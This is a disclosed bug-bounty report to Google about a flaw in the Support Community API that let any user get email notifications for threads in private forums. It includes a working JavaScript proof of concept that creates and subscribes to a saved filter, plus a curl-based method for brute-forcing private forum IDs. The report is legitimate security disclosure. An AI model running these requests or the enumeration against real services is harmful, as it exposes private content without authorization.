This is a bug I reported to Google via Google's Vulnerability Rewards Program on Jan 2, 2021.
Below is an intact reproduction of the report sent to Google (I censored some parts):
Reproduction steps
- Open Chrome and sign in at Google with any regular Google Account (it can be a new one).
- Go to https://support.google.com/chrome/thread/83519363?hl=en and press the "upvote˝ button so a forum profile is automatically created and associated to the Google Account. (not necessary if the profile already exists)
- Go to https://support.google.com/ and open the Javascript Console (Ctrl+Shift+J/Cmd+Alt+J).
- Run the following Javascript code in the Javascript Console:
// This script does the following things so the user can receive email // notifications for new posts in a specific forum: // 1. It saves a custom filter which matches threads from the target forum. // 2. It subscribes to the filter so the user receives notifications for new // threads which match the filter. // In this example the target forum is the [REDACTED] Private Forum: var targetForum = '[REDACTED]'; // This is a unique name for the new filter: var filterName = 'filtertest'; // HTTP request to create a saved filter for threads of the target Forum in // English fetch('https://support.google.com/s/community/api/CreateSavedSearch', { 'headers': { 'content-type': 'text/plain; charset=utf-8', }, 'body': JSON.stringify({ 2: { 1: filterName, 2: 'forum:' + targetForum + ' lang:en', }, }), 'method': 'POST', 'mode': 'cors', 'credentials': 'include' }).then(_ => { // HTTP request to subscribe to the saved filter fetch('https://support.google.com/s/community/api/SubscribeToSavedSearch', { 'headers': { 'content-type': 'text/plain; charset=utf-8', }, 'body': JSON.stringify({ 1: filterName, 3: [targetForum], }), 'method': 'POST', 'mode': 'cors', 'credentials': 'include' }); });
- Now, with a Google Account which has access to the private forum specified in the script (in the example the English Chrome Gold+ Private Forum), create a thread there by visiting https://support.google.com/s/community/new (select the forum and language according to the filter).
- Wait some time (up to 2 hours).
- The user who ran the script will receive an email notification about the new thread, even if that user doesn't have access to that private forum/thread.
Browser/OS: N/A
The issue is that the code which triggers notifications doesn't take into account the user's context: the fact that users don't necessarily have access to all the threads.
Attack scenario
This vulnerability can be exploited by any user as mentioned in the reproduction steps, although in order to come up with those steps the user needs to understand at least partially how the Community Console API works.
The Community Console is only accessible by Googlers and Product Experts (https://productexperts.withgoogle.com/what-is-it), so only those (and ex-Product Experts) would be able to learn directly how the Community Console API works (without taking into account that other users could learn this indirectly).
The attack scenario is the following:
- Find a forum ID for a private forum. This can be done in several ways:
- Brute force forum IDs: call the https://support.google.com/s/community/api/GetForum API endpoint with different forum IDs starting from 0 in ascending order, and when the endpoint returns an "Unauthorized" response, that means that's a forum we can target. This is feasible to do. Example of a call to the GetForum endpoint: curl 'https://support.google.com/s/community/api/GetForum' -H 'content-type: text/plain; charset=utf-8' --data '{"1":"1479660"}'
- Find the forum IDs in URLs shared "publicly˝. The person sharing the link might think that sharing the URL with some people who maybe don't have access to that thread is not bad because the access will just be denied (so they trust the server to provide proper access control). This is rarely the case, but can happen.
- Follow the reproduction steps attached in this report with the ID of the private forum, in order to create the saved filter and subscribe to it.
By doing this, the attacker can gain access to the content of the first message for each thread created after subscribing to the filter in that forum. [REDACTED]